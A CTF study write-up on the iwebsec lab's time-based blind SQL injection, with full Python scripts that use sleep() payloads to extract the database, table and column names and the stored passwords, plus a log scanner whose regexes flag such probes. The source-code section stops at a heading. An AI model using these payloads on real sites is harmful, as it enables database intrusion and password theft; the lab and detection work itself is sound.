CTF Study Notes 6: iwebsec SQL Injection Vulnerabilities - 03 - sleep injection

1. Solving process

(1) Observe the page

Regardless of whether the injected payload evaluates to true or false, the page output is identical, so boolean-based blind injection cannot be used; the response time is the only remaining signal, hence the sleep-based approach below.

(2) Write a script to extract the data item by item

1. Get the length of the database name (optional)

# encoding=utf-8
import requests
import time

# Target of the iwebsec lab instance (local VM address used in this write-up)
url = "http://192.168.182.130:8001/sqli/04.php"

def DbLen():
    # Try each candidate length; only the correct guess makes MySQL execute sleep(1),
    # so that request takes noticeably longer than the others
    for i in range(1, 10):
        payload = "?id=if(length(database())={},sleep(1),1)--+".format(i)
        req_url = url + payload
        start_time = time.time()
        requests.get(url=req_url)
        end_time = time.time()
        t = end_time - start_time
        if t > 1:
            print("DB length is " + str(i))
            break
DbLen()

2. Get the database name (optional)

def DbName():
    result = ""
    # The database name is 7 characters long (from step 1); recover one character per iteration
    for i in range(1, 8):
        # Binary search over the printable ASCII range for the character's code point
        l = 32
        r = 130
        mid = (l + r) >> 1
        while l < r:
            payload = "?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            # print(req_url)
            start_time = time.time()
            requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                # Delayed response: the character's code point is greater than mid
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))
DbName()

3. Get the table names

def TablesName():
    result = ""
    # group_concat() joins all table names of the current database into one string,
    # so a single character-by-character loop covers every table
    for i in range(1, 50):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while l < r:
            payload = ("?id=if(ord(mid((select group_concat(table_name) "
                       "from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+").format(i, mid)
            req_url = url + payload
            # print(req_url)
            start_time = time.time()
            requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        # Past the end of the string ord() returns 0, so the search bottoms out at 32 and
        # appends spaces; a run of trailing spaces means all the data has been read
        result = result + chr(mid)
        print("the result is {}".format(result))
TablesName()

4. Get the column names of the users table

def ColumnsName():
    result = ""
    # Same binary search as before, this time over the concatenated column names of users
    for i in range(1, 30):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while l < r:
            payload = ("?id=if(ord(mid((select group_concat(column_name) "
                       "from information_schema.columns where table_schema=database() "
                       "and table_name='users'),{},1))>{},sleep(1),1) --+").format(i, mid)
            req_url = url + payload
            # print(req_url)
            start_time = time.time()
            requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))
ColumnsName()

5. Get the data in the password column

def GetData():
    result = ""
    # Finally read the concatenated password column of iwebsec.users
    for i in range(1, 50):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while l < r:
            payload = "?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            # print(req_url)
            start_time = time.time()
            requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))
GetData()

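A defender-side counterpart, added here as an example and not part of the original write-up: the probes above leave a recognisable shape in the web server's access log (sleep()/benchmark() calls, if(...,sleep(...)) conditionals, ord(mid(...)) character extraction) and a burst of such requests from one source, since each recovered character costs about seven binary-search probes. The script scans constructed sample lines in Apache common log format (client addresses and timestamps are made up) and reports which requests match and how many per client.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache common log format), not from the original post.
# The first client replays the probe shapes used by the write-up's scripts; the second is benign.
SAMPLE_LOG = """\
192.168.182.1 - - [10/Oct/2023:10:00:01 +0800] "GET /sqli/04.php?id=1 HTTP/1.1" 200 512
192.168.182.1 - - [10/Oct/2023:10:00:02 +0800] "GET /sqli/04.php?id=if(length(database())=7,sleep(1),1)--+ HTTP/1.1" 200 512
192.168.182.1 - - [10/Oct/2023:10:00:04 +0800] "GET /sqli/04.php?id=if(ord(mid((select%20database()),1,1))%3E81,sleep(1),1)%20--+ HTTP/1.1" 200 512
192.168.182.1 - - [10/Oct/2023:10:00:05 +0800] "GET /sqli/04.php?id=if(ord(mid((select%20database()),1,1))%3E105,sleep(1),1)%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:10:00:06 +0800] "GET /sqli/04.php?id=2 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:10:00:07 +0800] "GET /index.php?q=sleeping%20tips HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Signatures of the time-based probes seen on this page. Each is checked against the
# URL-decoded query string, so %20 / %3E / + encodings do not hide them.
SIGNATURES = {
    "time_delay_function": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I),
    "conditional_delay": re.compile(r"\bif\s*\(.*?,\s*sleep\s*\(", re.I),
    "char_extraction": re.compile(r"\b(?:ord|ascii)\s*\(\s*(?:mid|substr|substring)\s*\(", re.I),
}

def classify(query: str) -> list:
    """Return the names of every signature that matches a decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan(log_text: str) -> list:
    """Parse each log line and report those whose query string looks like a timing probe."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        query = unquote_plus(urlsplit(m.group("target")).query)
        reasons = classify(query)
        if reasons:
            findings.append({"client": m.group("client"), "query": query, "reasons": reasons})
    return findings

def probes_per_client(log_text: str) -> Counter:
    """Count flagged requests per client; a blind extraction shows up as a burst from one source."""
    return Counter(f["client"] for f in scan(log_text))

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["reasons"], f["query"])
    print(probes_per_client(SAMPLE_LOG))
```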
2. Source code analysis

(1) PHP source

Key script
